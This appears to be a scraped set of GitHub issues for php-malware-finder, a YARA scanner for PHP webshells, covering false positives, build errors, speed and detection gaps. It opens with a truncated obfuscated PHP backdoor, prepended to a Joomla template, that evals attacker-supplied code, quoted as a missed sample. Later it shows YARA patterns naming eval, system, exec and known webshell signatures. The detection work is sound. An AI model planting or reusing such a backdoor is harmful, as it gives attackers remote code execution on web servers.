932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?><?php
/**
* @version $Id: cpanel.php 21097 2011-04-07 15:38:03Z dextercowley $
* @package Joomla.Administrator
* @subpackage Templates.hathor
* @copyright Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
* @since 1.6
*/
// no direct access
defined('_JEXEC') or die;
$app = JFactory::getApplication();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
<jdoc:include type="head" />
<!-- Load system style CSS -->
root@poney:~/php-malware-finder/php-malware-finder# git diff
diff --git a/php-malware-finder/malwares.yara b/php-malware-finder/malwares.yara
index 1fa5c22..bbb5b8f 100644
--- a/php-malware-finder/malwares.yara
+++ b/php-malware-finder/malwares.yara
@@ -57,7 +57,7 @@ private rule CloudFlareBypass
rule ObfuscatedPhp
{
strings:
- $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[[:space:]]*\(/ // ;eval( <- this is dodgy
+ $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[\t ]*\(/ // ;eval( <- this is dodgy
$b374k = "'ev'.'al'"
$align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k
$weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
ObfuscatedPhp /tmp/eval//cpanel.php
0x294d:$eval: {eval(
root@poney:~/php-malware-finder/php-malware-finder# git checkout malwares.yara
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
root@poney:~/php-malware-finder/php-malware-finder#
I'm wondering why, in php.yar, there is a condition that the file must be less than 5MB: https://github.com/nbs-system/php-malware-finder/blob/be0b64f9bc936c459a6b32e76c6365bc54591b81/php-malware-finder/php.yar#L33
This seems to have been added in this commit: nbs-system/php-malware-finder@97b6069
As of 6cf5148 make tests
crashes.
Step 21 : RUN make tests
---> Running in 8d2095e0ccd2
./whitelists/custom.yar(12): error: syntax error, unexpected _IDENTIFIER_
./whitelists/custom.yar(16): error: unterminated regular expression
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
Makefile:5: recipe for target 'tests' failed
make: *** [tests] Error 1
The command '/bin/sh -c make tests' returned a non-zero code: 2
ERROR: Build failed: exit code 1
See full log here: https://lw-scm.de/lipperts-web/docker-pmf/builds/2991
In Version 0.3.1 that worked perfect:
Step 21 : RUN make tests
---> Running in fbf8ddb71df3
[+] Congratz, the 54 tests succeeded!
---> 7ad857656951
I've had previously infected wordpress websites that I had to cleanup. I always get a clean version and will reinstall all the plugins but would have to manually clean a custom theme or plugin and would heavily use grep looking for eval
, backticks
, preg_replace
with e
flag etc. This project would be a nice alternative for that part of the process however I just tried running this against a freshly downloaded wordpress and got a few false positives:
$ ./phpmalwarefinder ../wordpress/
DodgyPhp ../wordpress//wp-admin/includes/schema.php
ObfuscatedPhp ../wordpress//wp-admin/includes/template.php
ObfuscatedPhp ../wordpress//wp-admin/includes/class-ftp.php
DodgyPhp ../wordpress//wp-includes/load.php
DodgyPhp ../wordpress//wp-includes/functions.php
ObfuscatedPhp ../wordpress//wp-includes/class-IXR.php
DodgyPhp ../wordpress//wp-includes/class-pop3.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.lib.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.tag.id3v2.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.audio-video.matroska.php
DodgyPhp ../wordpress//wp-includes/class-phpmailer.php
ObfuscatedPhp ../wordpress//wp-includes/formatting.php
ObfuscatedPhp ../wordpress//wp-includes/js/tinymce/tinymce.min.js
DodgyPhp ../wordpress//wp-includes/random_compat/random.php
While I understand that false positives will always happen and I'd rather have a false positive than a false negative, it would be really useful to show the lines of code that triggered it so I can investigate it myself.
When pmf shows multiple files in its output, it can be hard for a human to sort files and find real malwares.
Yara can tag files, we should use this functionality to help in detecting real webshells/web malwares.
Hi NBS, thanks for your great work!
I found a huge optimization by moving the whitelist hashing out of Yara. My client implementation is 40x faster on a standard Magento 2.0.6 source, while scanning the same stuff:
# time ./phpmalwarefinder -l php /data/all-magento/magento-2.0.6
[...]
real 9m59.357s
user 9m46.948s
sys 0m4.432s
vs
# time mwscan --ruleset nbs /data/all-magento/magento-2.0.6 --deep
Tue Jan 17 15:11:33 2017 Using NBS rules.
Tue Jan 17 15:11:33 2017 Fetching php.yar
Tue Jan 17 15:11:33 2017 Fetching whitelist.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/drupal.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/wordpress.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/symfony.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/phpmyadmin.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/magento2.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/prestashop.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/custom.yar
Tue Jan 17 15:11:34 2017 Fetching common.yar
Tue Jan 17 15:11:34 2017 Loaded 15 yara rules and 1279 whitelist entries
Tue Jan 17 15:11:48 2017 Finished scanning 41514 files: 76 malware and 25 whitelisted.
real 0m14.652s
user 0m10.116s
sys 0m1.512s
The profit comes from how inefficient Yara handles hashing. You mentioned that in the source already. They have recently improved things in the master branch a bit, but it will take a while before that version ends up in various Linux distributions.
To test mwscan
on Ubuntu:
sudo apt install -qy python-pip python-dev gcc
sudo pip install --no-cache-dir --upgrade mwscan
mwscan --help
mwscan --ruleset nbs <path>
Or CentOS:
wget https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
sudo rpm -ivh epel-release-latest-6.noarch.rpm
sudo yum -y install python-pip python-devel gcc
sudo pip install --no-cache-dir --upgrade mwscan
Cheers!
Willem
(update: I've published mwscan as package, so you can do just pip install mwscan
now)
There is a false postive test on prestashop/tools/htmlpurifier/HTMLPurifier.standalone.php
Currently, PMF uses <?
to detect php files. Shall we use <?php
instead ot reduce false positives?
Every important opensource project have a logo, PMF should have one since it's among the best malware finding tool on unix web servers.
I can't seem to fire this up. I tried using the Makefile and I also tried invoking php-malware-finder/phpmalwarefinder directly but both give the following error output:
$ ./phpmalwarefinder /var/www/sites/default/files
./php.yar(1): error: syntax error, unexpected _IDENTIFIER_, expecting $end or _RULE_ or _PRIVATE_ or _GLOBAL_
whitelists/drupal.yar(10): error: undefined identifier "hash"
whitelists/wordpress.yar(10): error: undefined identifier "hash"
whitelists/symfony.yar(10): error: undefined identifier "hash"
whitelists/phpmyadmin.yar(10): error: undefined identifier "hash"
whitelists/magento2.yar(10): error: undefined identifier "hash"
whitelists/prestashop.yar(10): error: undefined identifier "hash"
whitelists/custom.yar(11): error: undefined identifier "hash"
whitelist.yar(20): error: undefined identifier "hash"
whitelist.yar(62): error: undefined identifier "hash"
whitelist.yar(75): error: undefined identifier "hash"
whitelist.yar(84): error: undefined identifier "hash"
whitelist.yar(98): error: undefined identifier "hash"
whitelist.yar(109): error: undefined identifier "hash"
whitelist.yar(115): error: undefined identifier "Symfony"
common.yar(91): error: undefined identifier "IsWhitelisted"
common.yar(156): error: undefined identifier "IsWhitelisted"
common.yar(192): error: undefined identifier "IsWhitelisted"
./php.yar(44): error: undefined identifier "IsWhitelisted"
./php.yar(55): error: undefined identifier "IsWhitelisted"
./php.yar(71): warning: $concat is slowing down scanning
./php.yar(73): error: undefined identifier "IsWhitelisted"
./php.yar(101): error: undefined identifier "IsWhitelisted"
./php.yar(161): error: undefined identifier "IsWhitelisted"
./php.yar(175): error: undefined identifier "PasswordProtection"
There are no installation instructions except requiring YARA, which I installed (2.0.0-2 from Ubuntu 14.04.5)
Please help. I cannot use this yet.
It would be nice to check that those samples are correctly detected.
Hi! As noted in #45, your rules produce a lot of false positives for a clean Magento installation. How do you think the php-malware-finder project should handle this? Some options:
I am not sure about the best strategy. However I have created some Yara rules that are more strict and identify malware that was specifically found on Magento sites. Would love to collaborate!
Best
Willem
I compiled yara 3.4.0, but php-malware-finder still doesn't work :(
➜ php-malware-finder git:(master) yara -v 20:20:15
yara 3.4.0
➜ php-malware-finder git:(master) ./phpmalwarefinder . 20:20:17
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"
`Ubuntu 14.04 (x86_64)
Currently, releases aren't signed.
We need to decide with what key we (as in NBS System) want to sign them.
Also, since we now have an update mechanism (because people are too lazy to upgrade packages), it would be great if we could sign the updates too.
There are several low-hanging fruits to improve the scanning speed:
With the commit e3b724a malwares.yara has been split up, but the Makefile, the debian packaging , and even README.md still referring to it.
While running yara -r ./phpmalwarefinder /home/USER/public_html/site/, I got the following error:
./phpmalwarefinder /home/USER/public_html/site/
TooShort /home/USER/public_html/site/something/index.php
./malwares.yara(1): error: syntax error, unexpected IDENTIFIER, expecting $end or RULE or PRIVATE or GLOBAL
whitelist.yara(10): error: undefined identifier "hash"
whitelist.yara(27): error: undefined identifier "hash"
whitelist.yara(63): error: undefined identifier "hash"
whitelist.yara(72): error: undefined identifier "hash"
whitelist.yara(92): error: undefined identifier "hash"
whitelist.yara(116): error: undefined identifier "hash"
whitelist.yara(129): error: undefined identifier "hash"
whitelist.yara(138): error: undefined identifier "hash"
whitelist.yara(152): error: undefined identifier "hash"
whitelist.yara(163): error: undefined identifier "hash"
whitelist.yara(170): error: undefined identifier "Symfony"
./malwares.yara(71): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end
./malwares.yara(129): error: undefined identifier "IsWhitelisted"
./malwares.yara(188): error: undefined identifier "IsWhitelisted"
./malwares.yara(251): error: undefined identifier "IsWhitelisted"
./malwares.yara(283): error: undefined identifier "IsWhitelisted"
I have complete rights to scan in it, if thats the problem:
sudo chown -R USER:USER /home/USER/public_html
sudo chmod -R 775 /home/USER/public_html
I also submitted this error on the yara github page:
Rationale: We don't care about people using our software in their application, as long as they contribute back to PMF.
As written in this article :
https://dfir.it/blog/2016/12/07/webshells-rise-of-the-defenders-part-4/
When scanning a directory with PMF, the output has a double slash because yara concatenates it to the files and subdirs. This can lead to duplicates when trying to compare results to other outputs. So the lasting slash should be trimmed.
Sample is attached here:
https://gist.github.com/robbat2/f3e62e360f7eb1dab1a02c1e535039b8
Suggested detection:
Look for large strings that contain a string-reversed create_function
, but be sure to check case-insensitive.
output_list.append('hash.sha1(0, filename) == %s or // %s' % (hashlib.sha1(fname).hexdigest(), fname))
It should hash the content of the file, and not its name.
It seems that writing some helper scripts and not using them isn't a great idea after all :/
doubleval($_POST[$index]);
But its not eval($_POST)
just looks like it.
In documentations your are pointed to run make test
wich will fail in "no goal found".
In Makefile this task is called tests
: https://github.com/nbs-system/php-malware-finder/blob/master/Makefile#L4
May you update Makefile or Documentations.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.